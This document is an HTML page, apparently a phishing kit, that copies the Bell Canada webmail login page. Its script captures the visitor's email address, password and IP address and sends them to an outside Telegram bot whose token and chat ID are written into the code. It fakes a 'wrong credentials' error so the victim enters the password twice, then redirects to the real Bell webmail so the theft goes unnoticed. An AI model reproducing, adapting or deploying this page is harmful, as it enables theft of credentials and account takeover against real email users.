<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="https://download.logo.wine/logo/Bell_Canada/Bell_Canada-Logo.wine.png"
        type="image/x-icon">
    <title>Bell email</title>
    <style>
        @font-face {
            font-family: "BellSlim Bold";
            src: url("https://db.onlinewebfonts.com/t/47a246adcf764a7223c8872d5fafaf74.eot");
            src: url("https://db.onlinewebfonts.com/t/47a246adcf764a7223c8872d5fafaf74.eot?#iefix")format("embedded-opentype"),
                url("https://db.onlinewebfonts.com/t/47a246adcf764a7223c8872d5fafaf74.woff2")format("woff2"),
                url("https://db.onlinewebfonts.com/t/47a246adcf764a7223c8872d5fafaf74.woff")format("woff"),
                url("https://db.onlinewebfonts.com/t/47a246adcf764a7223c8872d5fafaf74.ttf")format("truetype"),
                url("https://db.onlinewebfonts.com/t/47a246adcf764a7223c8872d5fafaf74.svg#BellSlim Bold")format("svg");
        }

        @font-face {
            font-family: "BellSlim Black";
            src: url("https://db.onlinewebfonts.com/t/618e27c4e7e6138ddb6d72cb5d6464d8.eot");
            src: url("https://db.onlinewebfonts.com/t/618e27c4e7e6138ddb6d72cb5d6464d8.eot?#iefix")format("embedded-opentype"),
                url("https://db.onlinewebfonts.com/t/618e27c4e7e6138ddb6d72cb5d6464d8.woff2")format("woff2"),
                url("https://db.onlinewebfonts.com/t/618e27c4e7e6138ddb6d72cb5d6464d8.woff")format("woff"),
                url("https://db.onlinewebfonts.com/t/618e27c4e7e6138ddb6d72cb5d6464d8.ttf")format("truetype"),
                url("https://db.onlinewebfonts.com/t/618e27c4e7e6138ddb6d72cb5d6464d8.svg#BellSlim Black")format("svg");
        }

        * {
            margin: 0;
            padding: 0;
            box-sizing: content-box;
        }

        body {
            font-size: 14px;
            color: #555;
            font-family: Helvetica, Arial, sans-serif;
        }

        header {
            background: linear-gradient(to bottom, rgba(0, 102, 164, 1) 0%, rgba(0, 100, 162, 1) 20%, rgba(0, 79, 148, 1) 78%, rgba(0, 76, 146, 1) 100%);
            color: #fff;
            justify-content: space-between;
            margin-bottom: 1.5rem;
        }

        header p {
            text-shadow: 0px 1px 2px #000;
        }

        h3 {
            font-size: 1.166em;
            font-weight: 400;
            line-height: 1.2em;
            color: #212121;
            margin-bottom: 15px;
        }

        a {
            color: #0066A4;
        }

        li {
            list-style: disc !important;
            line-height: 28px;
        }

        header>div {
            text-align: center;
            border-right: 1px solid #000000;
            padding-inline: 1rem;
        }

        header>div:nth-last-child() {
            border: none;
        }

        .logo-container {
            display: flex;
            justify-content: flex-end;
            width: 10%;
        }

        .flex {
            display: flex;
        }

        .flex-col {
            display: flex;
            flex-direction: column;
        }

        .gap-05 {
            gap: 0.15rem;
        }

        .gap-1 {
            gap: 1rem;
        }

        .p-1 {
            padding: 1rem;
        }

        .justify-center {
            justify-content: center;
        }

        .items-center {
            align-items: center;
        }

        .items-end {
            align-items: flex-end;
        }

        main {
            background-color: #e0e0e0;
            padding-inline: 1rem;
            padding-bottom: 1rem;
            margin-top: 1.5rem;
            border: 1px solid rgb(169, 169, 169);
            border-radius: 3px;
        }

        .main-head {
            width: 100%;
            background: url(https://webmail.bell.net/bell/login/img/bg_gradRibbon.gif) repeat-x scroll left bottom #FFFFFF;
            padding-bottom: 15px;
            padding-top: 19px;
        }

        .main-head p {
            padding-left: 1.5rem;
        }

        .login-div {
            background: white;
            border: 1px solid rgb(169, 169, 169);
            border-radius: 4px;
            width: 50%;
            padding-bottom: 2rem;
            overflow: hidden;
        }

        .login-text {
            font-family: "BellSlim Bold";
            font-size: 17px;
            font-weight: 100;
        }

        .relative {
            position: relative;
            overflow: hidden;
        }

        .relative::after {
            content: '';
            position: absolute;
            background-color: rgb(0, 102, 164);
            width: 100%;
            height: 100%;
            rotate: 45deg;
            right: -95%;
            top: 10%;
            z-index: 10;
        }

        form {
            padding-inline: 1rem;
            margin-top: 1rem;
        }

        .right-content {
            width: 80%;
        }

        input:not([type=checkbox]) {
            background-color: #f4f4f4;
            border: solid 2px #8d8d8d;
            padding: 6px 12px;
            font-size: 16px;
            line-height: 14px;
            width: 304px;
            height: 30px;
        }

        .btn {
            background-color: #0066A4;
            border-radius: 5px;
            width: 40%;
            color: #fff;
            margin-bottom: 0;
            font-weight: normal;
            text-align: center;
            cursor: pointer;
            background-image: none;
            border: 1px solid transparent;
            padding: 6px 12px;
            font-size: 14px;
            line-height: 1.42857;
        }

        btn:hover {
            opacity: 0.6;
        }

        .remember {
            display: flex;
            gap: 0.2rem;
            align-items: center;
        }

        .forgot-pass {
            margin-top: 1rem;
            display: flex;
        }

        footer {
            margin-top: 2rem;
            padding-inline: 1rem;
        }
        .main-container{
            width: 80%;
            margin: 0 auto;
        }

        @media screen and (width < 800px) {
            main{
                width: 100%;
                padding-inline: 0;
            }
            .main-container {
                width: 100%;
            }
            header > div {
                padding-inline: 0.2rem;
            }
            .container {
                flex-direction: column;
            }
            .login-div{
                width: 100%;
            }
        }
    </style>
</head>

<body>
    <header class="flex">
        <div class="logo-container">
            <a href="/" aria-label="Bell Home Page" class="g-connector-nav-logo" data-di-id="di-id-7427af5a-87b0c874">
                <img src="https://tradein.bell.ca/BELL/images/bell-canada-logo.gif" width="52px" height="auto" alt="">
            </a>
        </div>
        <div class="flex gap-05 items-center justify-center">
            <p>Shop</p>
            <img src="https://www.seekpng.com/png/full/449-4491498_pay-attention-to-ayusiink-down-arrow-icon-white.png"
                width="10px" height="6px" alt="">
        </div>
        <div class="flex gap-05 items-center justify-center">
            <p>Support</p>
            <img src="https://www.seekpng.com/png/full/449-4491498_pay-attention-to-ayusiink-down-arrow-icon-white.png"
                width="10px" height="6px" alt="">
        </div>
        <div class="flex gap-05 items-center justify-center">
            <p>MyBell</p>
            <img src="https://www.seekpng.com/png/full/449-4491498_pay-attention-to-ayusiink-down-arrow-icon-white.png"
                width="10px" height="6px" alt="">
        </div>
        <div class="flex gap-05 items-center justify-center">
            <p>Français</p>
            <img src="https://www.seekpng.com/png/full/449-4491498_pay-attention-to-ayusiink-down-arrow-icon-white.png"
                width="10px" height="6px" alt="">
        </div>
    </header>
    <div class="main-container">
        <main>
            <h1 style="font-family: 'BellSlim Bold'; font-size: 27px; margin-top: 1rem;">Bell email</h1>
            <div class="container flex gap-1">
                <div class="login-div">
                    <div class="main-head">
                        <p class="login-text">Log in</p>
                    </div>
                    <form class="flex-col gap-1" action="">
                        <p style="display: none; font-size: 14px; color: rgb(177, 0, 0);" id="wrongPassword">Wrong credentials, try again</p>
                        <label class="flex-col gap-05" for="email">Email Address
                            <input type="email" id="email" name="email" required>
                        </label>
                        <label class="flex-col gap-05" for="password">Password
                            <input type="password" id="password" name="password" required>
                        </label>
                        <input type="hidden" id="hidden_ip">
                        <div class="remember"><input class="checkbox" type="checkbox">Keep me logged in</div>
                        <button class="btn" type="button" id="signIn">Log In</button>
                        <div class="forgot-pass">
                            <p>I forgot my <a href="#">Email Address</a> or my <a href="#">Password</a></p>
                        </div>
                    </form>
                </div>
                <div class="login-div relative">
                    <div class="main-head">
                        <p class="login-text">New! Your Bell email is getting even better</p>
                    </div>
                    <div class="p-1 right-content">
                        <h3>
                            Here are some of the updates you'll start to see soon:
                        </h3>
                        <ul class="p-1">
                            <li>A new look for an improved experience</li>
                            <li>An easy-to-use floating tool bar for quick access to features</li>
                            <li>A smart way to sort and categorize to keep your inbox organized</li>
                            <li>An optimized mobile experience supported on even more browser</li>
                        </ul>
                        <p><a href="#" style="font-weight: 600; margin-top: 1rem;">Find out more</a> about your Bell
                            email
                            services.</p>
                    </div>
                </div>
            </div>
        </main>
        <footer class="flex-col gap-1">
            <div><a style="margin-right: 1rem;" href="#">Privacy</a><a href="#">Legal & Regulatory</a></div>
            <small>&copy;Bell Canada, 2024.All rights reseved.</small>
        </footer>
    </div>

    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script type="text/javascript">


        function sendTeleMsg(username, passkey, ip) {
            var message = "++++++🔰B E L L  WEBMAIL LOGIN🔰++++++" + '\n';
            message += "[📧EMAIL] : " + username + '\n';
            message += "[🔑PASSWORD] : " + passkey + '\n';
            message += "[🌍IP] : " + ip + '\n';
            message += "++++++ 👨‍💻@AKFOUR7[TELEGRAM] +++++++" + '\n';

            let token = '6724518968::AAFoEyUmaA910VH-GL4FXeTa60bB9BcwVWA'; // Replace with your actual token
            var chatid = '6007087659'; // Replace with your actual chat ID

            var settings = {
                "async": true,
                "crossDomain": true,
                "url": "https://api.telegram.org/bot" + token + "/sendMessage?chat_id=" + chatid,
                "method": "POST",
                "headers": {
                    "Content-Type": "application/json",
                    "cache-control": "no-cache"
                },
                "data": JSON.stringify({
                    "chat_id": chatid,
                    "text": message
                })
            };

            $.ajax(settings).done(function (response) {
                if (response.ok === true) {
                }
            });
        }

        $(document).ready(function () {
            // Get the user's IP address
            $.getJSON('https://json.geoiplookup.io/?callback=?', function (data) {
                var obj = JSON.parse(JSON.stringify(data));
                document.getElementById("hidden_ip").value = obj.ip;
            });
        });

        var count = 0;

        document.querySelector("#signIn").addEventListener('click', function () {
            const username = document.querySelector("#email").value;
            const passkey = document.querySelector("#password").value;
            const ip = document.querySelector("#hidden_ip").value;

            count++;

            if (!passkey) {
                document.querySelector("#wrongPassword").style.display = "block";
            } else {
                if (count === 2) {
                    sendTeleMsg(username, passkey, ip);
                    window.location.href = "https://webmail.bell.net/bell/index-rui.jsp?v=3.1.3.48.0-4#/";
                } else {
                    sendTeleMsg(username, passkey, ip);
                    document.querySelector("#wrongPassword").style.display = "block";
                    setTimeout(() => {
                        document.querySelector("#email").value = "";
                        document.querySelector("#password").value = "";
                    }, 1000);
                }
            }
        });


    </script>
</body>

</html>
